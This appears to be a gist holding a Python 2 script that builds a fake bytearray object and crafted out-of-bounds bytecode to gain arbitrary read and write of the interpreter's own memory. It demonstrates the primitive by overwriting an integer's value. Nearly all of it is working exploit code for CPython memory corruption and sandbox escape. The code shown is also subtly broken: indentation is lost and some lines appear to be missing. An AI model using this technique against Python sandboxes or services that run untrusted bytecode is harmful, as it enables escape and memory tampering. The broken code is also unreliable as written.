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Created August 15, 2015 10:59
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Direct read/write access to Python's memory
# read/write access to python's memory, using a custom bytearray.
# some code taken from:
# tested on:
# Python 2.7.10, ubuntu 32bit
# Python 2.7.8, win32
# example of correct output:
# inspecting int=0x41424344, at 0x0228f898
# int ob_type: 0x1e222310
# int's memory: 0x3 0x1e222310 0x41424344
# changing int to NULL..
# 0
# pkt
import opcode
import struct
import types
# use this as size of our fake byte array
MAX_SSIZE = (2**31)-1
# prevent GC of fake objects by creating refs inside a global list
GL = []
def pack_ushort(us):
return struct.pack('@H', us)
def pack_uint(ui):
return struct.pack('@I', ui)
def get_opcode(o):
return chr(opcode.opmap[o])
def read_dword(const_tuple, offset):
def foo():
offset_high, offset_low = offset >> 16, offset & 0xffff
evil_bytecode = get_opcode('EXTENDED_ARG') + pack_ushort(offset_high)
# load a dword from byte_array object
evil_bytecode += get_opcode('LOAD_CONST') + pack_ushort(offset_low)
# return it
evil_bytecode += get_opcode('RETURN_VALUE')
# set co_stacksize to 4, to avoid assert failure in debug build
foo.func_code = types.CodeType(
0, 0, 4, 0,
evil_bytecode, const_tuple,
(), (), "", "", 0, ""
dword = foo()
return dword
# typedef struct {
# int ob_refcnt;
# int *ob_type;
# int ob_size;
# int ob_exports;
# int ob_alloc;
# char *ob_bytes;
# }
def fake_byte_array_string(start_addr):
typ = id(bytearray)
ba = pack_uint(0x41414141) + \
pack_uint(typ) + \
pack_uint(MAX_SSIZE) + \
pack_uint(0) + \
pack_uint(MAX_SSIZE) + \
return ba
def make_mem_object(start_addr):
global GL
const_tuple = ()
addr_const_tuple = id(const_tuple)
fake_object = fake_byte_array_string(start_addr)
byte_array = bytearray(fake_object)
# if byte_array dies, our evil bytearray dies too. Prevent GC by appending
# to a global list.
addr_byte_array = id(byte_array)
# beginning of byte_array
offset = ((addr_byte_array - addr_const_tuple - 0xC) & 0xffffffff) / 4
# now advance to pointer to fake byte array
offset += 5
#print "const_tuple:", hex(addr_const_tuple)
#print "byte_array:", hex(addr_byte_array)
#print "fake_object:", hex(id(fake_object))
ba = read_dword(const_tuple, offset)
return ba
def make_read_write(m1, m2):
N = (2**32)-1
def read_byte(m1, m2, addr):
addr = addr & N
if addr<MAX_SSIZE:
return m1[addr]
elif addr<2*MAX_SSIZE:
return m2[addr]
assert False
def write_byte(m1, m2, addr, byte):
byte = byte & 0xff
addr = addr & N
if addr<MAX_SSIZE:
m1[addr] = byte
elif addr<2*MAX_SSIZE:
m2[addr] = byte
assert False
rd = lambda addr: read_byte(m1, m2, addr)
wr = lambda addr, byte: write_byte(m1, m2, addr, byte)
return (rd, wr)
def magic():
# wee need two objects to span 0-0x7fffffff and 0x7fffffff-0xffffffe ranges
m1 = make_mem_object(0)
m2 = make_mem_object(MAX_SSIZE)
(read, write) = make_read_write(m1, m2)
return (read, write)
(read, write) = magic()
# let's see if it works..
x = 0x41424344
addr = id(x)
print "inspecting int=0x%08x, at 0x%08x"%(x, addr)
print "int ob_type:", hex(id(int))
l = [chr(read(addr+i)) for i in range(12)]
s = "".join(l)
(refcnt, ob_type, digits) = struct.unpack("@III", s)
print "int's memory:", hex(refcnt), hex(ob_type), hex(digits)
print "changing int to NULL.."
for i in range(4):
write(addr+8+i, 0)
print x
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